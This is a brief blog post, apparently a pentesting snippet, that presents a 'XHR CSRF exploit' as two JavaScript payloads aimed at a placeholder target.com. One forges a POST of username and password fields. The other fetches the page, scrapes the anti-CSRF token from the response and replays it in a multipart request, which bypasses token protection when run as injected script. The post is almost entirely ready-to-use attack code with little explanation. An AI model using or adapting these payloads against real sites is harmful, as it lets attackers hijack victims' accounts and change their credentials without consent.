XHR CSRF exploit

Posted on by Kael

With out filter and regular form :

var target = "https://target.com";
var params = "username=myUsername&password=myPassword";
var xhr = new XMLHttpRequest();  
xhr.open("POST", target, false); 
xhr.send(params);

With CSRF token filter and multipart/form-data form :

var res = null;
var target = "https://target.com";
// Fetch initial CSRF token
var xhr = new XMLHttpRequest();  
xhr.open("GET", target, false); 
xhr.send(null);
if ( xhr.readyState === 4 ) {
  // Emulate a new div to parse response data as DOM
  res = document.createElement( 'div' );
  res.innerHTML = xhr.responseText;
  res.querySelector("#token");
  token = res.querySelector("#token").value;
  // Send the payload
  xhr.open("POST", target, false);
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarygBe7zTLe1GhTyPGA");
  xhr.send('------WebKitFormBoundarygBe7zTLe1GhTyPGA\n' +
        'Content-Disposition: form-data; name="username"\n\n' +
        'myUsername\n' +
        '------WebKitFormBoundarygBe7zTLe1GhTyPGA\n' +
        'Content-Disposition: form-data; name="password"\n\n' +
        'myPassword\n' +
        '------WebKitFormBoundarygBe7zTLe1GhTyPGA\n' +
        'Content-Disposition: form-data; name="token"\n\n' +
        token +'\n' +
        '------WebKitFormBoundarygBe7zTLe1GhTyPGA--');
  if ( xhr.readyState === 4 ) {
     // Log the result
     console.log(xhr.responseText);
  }
}

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.